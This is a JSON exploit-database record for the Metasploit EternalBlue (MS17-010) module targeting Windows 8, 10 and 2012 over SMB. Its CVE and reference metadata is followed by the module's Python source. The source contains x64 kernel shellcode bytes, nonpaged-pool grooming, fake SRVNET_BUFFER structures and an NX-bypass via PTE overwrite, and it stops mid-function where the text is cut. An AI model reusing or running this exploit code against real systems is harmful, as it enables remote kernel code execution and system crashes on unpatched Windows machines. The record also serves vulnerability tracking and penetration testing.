{"hash": "a399fb2a0d2b54be61b63ce9fb2f1e84", "key": "title"}, {"hash": "5b950e6a1604ac171f8fe1ccc327b50e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bc9f4d2df77a7e598c51cbbb28b6c763", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "immutableFields": [], "lastseen": "2020-09-18T18:32:29", "modified": "2019-11-02T02:20:22", "objectVersion": "1.5", "published": "2018-06-18T16:41:57", 
"references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 451}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-09-18T18:32:29"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. 
Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-01-08T17:48:55", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", 
"PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-01-08T17:48:55", "value": 7.7, "vector": "NONE"}}, "hash": "e2220776e8cde746959dfd4abe7c3c98", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-01-08T17:48:55", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. 
Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': '2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': 
True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n '\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n '\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n 
'\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n '\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n '\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n 
'\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n '\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. 
if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. 
This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. 
The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx 
+= pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += 